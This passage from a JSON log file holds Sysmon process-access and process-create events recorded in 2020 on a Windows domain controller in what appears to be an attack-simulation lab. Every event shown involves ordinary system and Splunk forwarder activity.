{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7292,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.074\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-049D-5F25-0000-0010188A0F00}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.074","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-049D-5F25-0000-0010188A0F00}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7293,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.074\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-049D-5F25-0000-0010188A0F00}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.074","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-049D-5F25-0000-0010188A0F00}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7294,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.074\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-049D-5F25-0000-0010188A0F00}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.074","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-049D-5F25-0000-0010188A0F00}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7295,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.199\r\nSourceProcessGUID: {A837DB8D-049D-5F25-0000-001032880F00}\r\nSourceProcessId: 3356\r\nSourceThreadId: 4120\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.199","SourceProcessGUID":"{A837DB8D-049D-5F25-0000-001032880F00}","SourceProcessId":"3356","SourceThreadId":"4120","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7296,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.811\r\nProcessGuid: {A837DB8D-049D-5F25-0000-0010D58F0F00}\r\nProcessId: 172\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.811","ProcessGuid":"{A837DB8D-049D-5F25-0000-0010D58F0F00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7297,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.809\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001027FA0D00}\r\nTargetProcessId: 172\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.809","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001027FA0D00}","TargetProcessId":"172","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7298,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.809\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001027FA0D00}\r\nTargetProcessId: 172\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.809","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001027FA0D00}","TargetProcessId":"172","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7299,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.809\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.809","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7300,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.809\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.809","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime